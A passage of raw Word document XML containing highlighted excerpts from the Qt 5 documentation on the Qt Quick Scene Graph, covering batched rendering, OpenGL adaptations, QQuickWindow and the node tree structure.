      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method can be used to block the test until the signal occurs (or a timeout expires).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRPr="001E089F" w:rsidRDefault="001E089F" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1968" w:history="1">
        <w:r w:rsidR="001113FB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="009F0E57">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1599" w:name="_Toc483000877"/>
      <w:bookmarkStart w:id="1600" w:name="_Toc483003870"/>
      <w:bookmarkStart w:id="1601" w:name="_Toc483604222"/>
      <w:bookmarkStart w:id="1602" w:name="_Toc483605442"/>
      <w:r w:rsidRPr="00111EA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Scene Graph</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1599"/>
      <w:bookmarkEnd w:id="1600"/>
      <w:bookmarkEnd w:id="1601"/>
      <w:bookmarkEnd w:id="1602"/>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bookmarkStart w:id="1603" w:name="the-scene-graph-in-qt-quick"/>
      <w:bookmarkEnd w:id="1603"/>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick 2 makes use of a </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dedicated scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> based and a series of </w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adpatations</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of which the </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default uses OpenGL ES 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL 2.0 for its rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using a scene graph for graphics rather than the traditional imperative painting systems (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1969" w:history="1">
        <w:r w:rsidRPr="009D6514">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QPainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and similar), means the scene to be rendered can be retained between frames and the complete set of primitives to render is known before rendering starts</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>opens up for a number of optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to minimize state changes and </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>discarding obscured</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> primitives.</w:t>
      </w:r>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For </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, say a user-interface contains a list of ten items where each item has a background color, an icon and a text. Using the traditional drawing techniques, this would result in 30 draw calls and a similar amount of state changes. A scene graph, on the other hand, could reorganize the primitives to render such that all backgrounds are drawn in one call, then all icons, then all the text, reducing the total amount of draw calls to only 3. Batching and state change reduction like this can </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>greatly improve performance</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on some hardware.</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scene graph is </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>closely tied to Qt Quick 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can not be used stand-alone. The scene graph is </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>managed and rendered by the</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1970" w:history="1">
        <w:r w:rsidRPr="009D6514">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and custom Item </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">types </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can a</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dd their graphical primitives</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the scene graph through a </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call to</w:t>
      </w:r>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1971" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="009F0E57">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D6514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>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w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph is a graphical representation of the Item scene</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, an </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>independent structure that contains enough information to render all the items</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Once it has been set up, it can be manipulated and rendered independ</w:t>
      </w:r>
      <w:r w:rsidR="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ently of the state of the items.</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On many platforms</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the scene graph will even be rendered </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on a dedicated render thread</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while the GUI thread is preparing the next frame's state</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Much of the information listed on this page is specific to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default OpenGL adaptation</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the Qt Quick Scene graph. For more information about the different scene graph </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adaptations</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> see</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1972" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph Adaptations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="009F0E57">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1604" w:name="qt-quick-scene-graph-structure"/>
      <w:bookmarkStart w:id="1605" w:name="_Toc483000879"/>
      <w:bookmarkStart w:id="1606" w:name="_Toc483003872"/>
      <w:bookmarkStart w:id="1607" w:name="_Toc483604223"/>
      <w:bookmarkStart w:id="1608" w:name="_Toc483605443"/>
      <w:bookmarkEnd w:id="1604"/>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Scene Graph Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1605"/>
      <w:bookmarkEnd w:id="1606"/>
      <w:bookmarkEnd w:id="1607"/>
      <w:bookmarkEnd w:id="1608"/>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scene graph is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>composed of a number of predefined node types</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, each serving a dedicated purpose. Although we refer to it as a scene graph, a more precise definition is node tree. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tree</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is built from</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1973" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">types in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML scene</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and internally the scene is then processed by a renderer which draws the scene. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The nodes themselves do</w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
